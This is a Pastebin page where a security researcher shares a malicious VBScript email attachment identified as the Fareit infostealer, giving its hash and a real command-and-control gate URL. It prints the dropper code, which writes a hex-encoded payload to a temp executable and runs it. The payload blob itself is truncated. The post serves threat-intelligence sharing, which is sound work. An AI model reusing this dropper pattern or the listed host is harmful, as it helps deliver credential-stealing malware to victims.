API tools faq
paste
Neonprimetime

Malicious VBS Email Attachment 199.16.199.2/chromespony/

Neonprimetime
Nov 13th, 2015
238
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 1.22 KB | None | 0 0
raw download clone embed print report
  1. Malicious VBS Attachment in Email
  2. ******
  3. Blog Walking thru the VBS code below: http://neonprimetime.blogspot.com/2015/11/malicious-vbs-script-walkthrough.html
  4. ******
  5. Reported by neonprimetime security
  6. Blog: http://neonprimetime.blogspot.com
  7. Twitter: https://twitter.com/neonprimetime    @neonprimetime
  8. VirusTotal: https://www.virustotal.com/en/user/neonprimetime/
  9. Reddit: https://www.reddit.com/user/neonprimetime
  10.  
  11. ****
  12. Attachment: 02-07-15-ORDER.vbs
  13. MD5: 1e706d88f4286c5c8133165dfa25c4b4
  14. Malware:  InfoStealer.Fareit
  15. Payload: post 199.16.199.2/chromespony/panelnew/gate.php
  16. *****
  17. data="895C241833C333442334424403344244...<REDACTED DUE TO PASTEBIN SIZE LIMITATION>...4444494e475858504144":
  18. data=split(data,"H")(1):
  19. sub saveFile(fName,str):
  20. dim temp:
  21. set xmldoc = CreateObject("Microsoft.XMLDOM"):
  22. xmldoc.loadXml "<?xml version=""1.0""?>":
  23. set pic = xmldoc.createElement("pic"):
  24. pic.dataType = "bin.hex":
  25. pic.nodeTypedValue = str:
  26. temp = pic.nodeTypedValue:
  27. with CreateObject("ADODB.Stream"):
  28. .type = 1:.open:
  29. .write temp:
  30. .saveToFile fName, 2:
  31. .close:end with:
  32. end sub:
  33. set ws = CreateObject("WScript.Shell"):
  34. fn = ws.ExpandEnvironmentStrings("%temp%") & "\tmp.exe":
  35. saveFile fn,data:
  36. ws.Run fn:
  37. wscript.sleep 100
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!